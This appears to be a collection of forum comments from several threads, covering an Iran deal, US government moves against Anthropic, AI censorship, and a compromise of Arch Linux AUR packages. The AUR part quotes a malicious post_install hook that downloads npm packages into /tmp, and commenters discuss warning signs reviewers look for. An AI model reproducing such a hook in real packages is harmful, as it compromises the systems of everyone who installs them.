I can see the logic in what you’re saying, but Iran state media is reporting the deal includes “The US and its allies delivering reconstruction plans for Iran worth at least $300bn” (in addition to the $25B) but I don’t understand their use of the word “plan”? https://www.bbc.com/news/live/cj0grpyg4v1t?post=asset%3A1793...
Two diplomats briefed on the latest draft called it “an international ‘investment fund,’ which the United States would help facilitate in the event of a final deal,” and plans for which would be discussed during the initial 60-day negotiations period that the memorandum would kick off, the report says.
It appears to concern the authorisation of a sort of Marshall Plan inward investment fund that may end up holding that sort of amount of cash that the US effectively agrees to facilitate and allow.
But I guess a key thing is that it involves is the USA agreeing not to seize it. It would also implicitly allow businesses to do the reconstruction work without being sanctioned.
Under a JCPOA extension, why would items like access to the global oil markets (in addition to sanctions) not be part of the negotiations?
And with JCPOA and its possible continuation, that was a joint agreement among a number of countries - in the current situation, it’s just the U.S./Israel (+ them trying to impose their will on other countries to go along with any carrots/sticks).
Are you suggesting like <package-name>.packaged-by.joe-Schmoe ? And then if Joe Schmoe abandons it, people should instead switch to <package-name>.packaged-by.Abe-Lincoln etc?
But for your IG example, isn’t that probably because although most people may claim they want to see everyday moments from friends, people in real life actually click more on the “thirst traps” etc?
It is, but I don't think you can infer a revealed preference from that. It's perfectly consistent for someone to want to avoid thirst traps because they know they're too inclined to click.
For the current Anthropic issue, I’d say that’s more likely to just be generic corruption, revenge, shakdeown, and/or incompetence from the Trump admin. ‘Censoring’ might be technically correct, but I think one of the aforementioned verbs is a better fit.
china is doing political censorship on specific well known topics - their current government, corruption and workers rights, taiwan, tiananmen square, human rights in xinjiang, old communist leaders and a couple others. not defending them just to be clear. the rules are the same for everyone, if your model cant give you anti ccp views with normal prompting you are safe. they never tried to restrict access to a model thats already public for vague security reasons.
Probably. But it would be at least somewhat thought-out and apply to all the AI providers. Not just the one currently disfavored by Captain Dipshit and the Sycophants.
I really don't know why business cozies up to Trump so much, given how unbelievably unreliable and mercurial he is about...everything.
Is it? Would bioweapon instruction restrictions be equivalent to disallowing reporting on whether the government is massacring large numbers of citizens in your city? Both are ‘censorship’ but don’t seem remotely equivalent to me.
Do you believe it’s only censorship where context shouldn’t be applied? Like if someone had a principled view "violence is wrong", would non-lethal violence in a clear case of self-defense be “equally wrong” as the guy who personally killed tens of thousands of captured POWs (Blokhin)? As “violence is violence”?
>> Would bioweapon instruction restrictions be equivalent to disallowing reporting on whether the government is massacring large numbers of citizens in your city?
> If you believe censorship is wrong, then it is equally wrong no matter what the topic is.
Are you agreeing with that view, or merely saying it’s a theoretical view but you think such believers are wrong?
I should think learning about history should lead to a desire for citizens to be able to quietly make weapons at home given the many documented cases of governments across the world mass murdering their own citizens (or foreign governments invading and genociding). What's the point of telling people the wrongs of their oppressors while simultaneously disempowering them from doing anything about it or preparing to defend themselves in the future?
So yes they're not just comparable, but two sides of the same coin.
The idea that Chinese citizens could’ve prevented the Tiananmen massacre with a bunch of home printed AK-47s is silly. The government had tanks. The same applies in the US.
Isn’t Trump’s Science and Technology Advisors Council pretty much entirely made up of Trump donors, rich investors, and/or cryptocurrency CEOs, whereas pretty much every other president included legitimate science and technology advisors on it? (I last checked 2 or 3 months ago.)
It could be the Trump admin incompetently attempting to help Trump’s primary benefactor? (As I haven’t yet seen anyone say that the current actions are a competent approach to AI regulation.)
What is the basis for that claim? There’s been lots of wild conjecture, but as The Guardian reported, “Almost none of this had any relationship to reality” and “LLMs-gone-rogue dominated coverage, but had nothing to do with the targeting.” https://www.theguardian.com/news/2026/mar/26/ai-got-the-blam...
> You have to review the source of every PKGBUILD from the AUR you install, full stop. Yes that includes any updates.
But isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package, etc? (Unless you are running them somewhere without internet access or without access to anything you don’t mind being public?)
Maybe it’s not the case for aur, but the others could theoretically be improved with better permissions, sandboxing, etc. I guess browser extensions basically have those options, even if no “normal” users use them.
Unfortunately 99.99% of people can’t or don’t have the time to review everything. :-(
I guess distro packages where there are trusted maintainers, or places like the iOS App Store where there are both permissions and somewhat of a review process, are the safest.
> isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package
Yes, and all of those have supply chain hacks in them, and have happened within the last year? In this specific case, it's a malicious npm package being installed with official npm tooling in the PKGBUILD.
The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing, they are very simple bash scripts. It'd be great if more people would donate resources to help verify and validate AUR scripts, but the AUR specifically exists for packages that the trusted users and devs of arch don't have time to personally maintain.
> The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing
Simply reviewing the PKGBUILD is not enough for the same reason reviewing a Makefile is not enough: You need to review the source code for _everything_ that is being downloaded and executed on your machine. For AUR packages, that means not just the PKGBUILD but the full source code for the program it is building and the full source code for any of its dependencies.
Hypothetical example: you wouldn't have caught the xzutils exploit by reading the PKGBUILD.
No it wasn't? It ran npm install from post install script in another file. If they named it better people probably wouldn't have even noticed so quickly.
True, but looking at a compromised PKGBUILD[0], it looks like it is installing "atomic-lockfile" and "figures". I think 99% of people reading the PKGBUILD would assume those are legit dependencies needed by the program. It's not like it was running "npm install 1337hax0r". Which is why you need to read the source for both "atomic-lockfile" and "figures" (and literally everything else).
in /tmp?! in post_install()??! With a new random contributor email????
Archlinux is focused on enabling a specific type of user, and certainly ones that can read bash scripts, and understand reasonable depedencies vs unreasonable ones. And even then - this is specifically in the AUR and not a package the distro directly offers.
Programs often invoke other programs through the exec* family of syscalls. For example, git is written in C but it ships with perl dependencies. It is not unreasonable to assume pass-cli added a runtime dependency on a program written in javascript. Regardless, we're talking hundreds of AUR packages have been compromised, I'd be shocked if none of them were javascript-based programs. Perhaps pass-cli was simply a bad example for me to choose.
> It changes the contributor email?
I think this is the 2nd most sus change, but even so, I have changed email addresses over the years so it isn't completely unreasonable.
I'm not sure if you're trying to strawman or are inexperienced.
No, this in no way or shape looks like installing a legitimate dependency to the target audience (expert users). This is a package manager, you don't install dependencies via post_install.
From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line:
> install=toggldesktop-bin-deps.install
And the toggldesktop-bin-deps.install contains this:
> post_install() {{
> cd /tmp
> bun add axios uuid ora js-digest
> }}
Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs.
- sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc.
- extensive post install scripts suggesting it's doing a lot more than is normal
But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days...
i wouldn't necessarily trust a repo that does seem relevant either. it's trivial to put any data you want at a url which, at a glance, appears to legitimately belong to any repo you can fork.
typically attacks happen when the URL for the source code or binary gets changed significantly... or like in this attack someone adds something to the post_install section which does something like add an npm install command. a lot of updates for binaries are just version bumps and SHA hashes changing which are easy to vet if you trust the source to not be compromised.
Some of these have corporate backing and/or better funding and thus more manpower to review things, but yeah it essentially applies to all of them. It's no accident that there's news about a new npm package being compromised every other week.
Ultimately, the way we're doing permissions on the OS level is fundamentally broken on desktop OSes, and we're increasingly feeling the effects of that. Ideally everything should be sandboxed by default, and only given access to it's own files, instead of everything the user has.
But we're a long way away from that, and that's not something a single project could enforce.
Apparently I was almost affected, but I dont update arch frequently enough, that my alvr package was not updated during the window.
It's also a good thing that Arch Linux has people hawking it, so if these things happen they get caught on insanely quickly. I wonder if there's sane ways to protect your dotfiles from rogue processes just touching them.
I usually use "yay" for all my stuff, so I might have to consider telling yay to only update system files, apparently one way to decrease this type of attack is to get a hardware key for your SSH files, might finally have a reason to get a yubikey or similar.
reply